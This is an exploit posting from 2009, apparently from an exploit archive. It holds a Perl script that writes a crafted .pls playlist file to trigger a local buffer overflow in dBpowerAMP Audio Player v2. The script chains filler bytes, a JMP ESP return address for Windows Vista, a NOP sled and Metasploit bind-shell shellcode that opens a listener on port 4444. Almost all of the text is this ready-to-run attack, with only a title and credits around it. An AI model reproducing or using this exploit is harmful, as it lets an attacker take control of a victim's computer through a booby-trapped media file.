dbpoweramp2-overflow.txt
Posted on 29 January 2009
# dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit # Exploited By AlpHaNiX # From NullArea.Net # Thanks Stack For The PoC system("cls") ; print " [+] dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit" ; my $blah= "x41" x 600; my $nop = "x90" x 52 ; my $ret = "xC7xEBxFAx75" ; # 77C80F1A JMP ESP [ntdll v6.0 vista en ultimate] # win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com my $shellcode = "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x50". "x80x56xeax83xebxfcxe2xf4xacxeaxbdxa7xb8x79xa9x15". "xafxe0xddx86x74xa4xddxafx6cx0bx2axefx28x81xb9x61". "x1fx98xddxb5x70x81xbdxa3xdbxb4xddxebxbexb1x96x73". "xfcx04x96x9ex57x41x9cxe7x51x42xbdx1ex6bxd4x72xc2". "x25x65xddxb5x74x81xbdx8cxdbx8cx1dx61x0fx9cx57x01". "x53xacxddx63x3cxa4x4ax8bx93xb1x8dx8exdbxc3x66x61". "x10x8cxddx9ax4cx2dxddxaax58xdex3ex64x1ex8exbaxba". "xafx56x30xb9x36xe8x65xd8x38xf7x25xd8x0fxd4xa9x3a". "x38x4bxbbx16x6bxd0xa9x3cx0fx09xb3x8cxd1x6dx5exe8". "x05xeax54x15x80xe8x8fxe3xa5x2dx01x15x86xd3x05xb9". "x03xd3x15xb9x13xd3xa9x3ax36xe8x47xb6x36xd3xdfx0b". "xc5xe8xf2xf0x20x47x01x15x86xeax46xbbx05x7fx86x82". "xf4x2dx78x03x07x7fx80xb9x05x7fx86x82xb5xc9xd0xa3". "x07x7fx80xbax04xd4x03x15x80x13x3ex0dx29x46x2fxbd". "xafx56x03x15x80xe6x3cx8ex36xe8x35x87xd9x65x3cxba". "x09xa9x9ax63xb7xeax12x63xb2xb1x96x19xfax7ex14xc7". "xaexc2x7ax79xddxfax6ex41xfbx2bx3ex98xaex33x40x15". "x25xc4xa9x3cx0bxd7x04xbbx01xd1x3cxebx01xd1x03xbb". "xafx50x3ex47x89x85x98xb9xafx56x3cx15xafxb7xa9x3a". "xdbxd7xaax69x94xe4xa9x3cx02x7fx86x82xa0x0ax52xb5". "x03x7fx80x15x80x80x56xea"; my $buff = $blah.$ret.$nop.$shellcode ; open(pls, "> alp1x.pls"); my $plsfile = '[playlist]'." ". 'NumberOfEntries=1'." ". "File1=http://".$buff ; print pls $plsfile ; close (pls); print " [!] File Creation Done !";
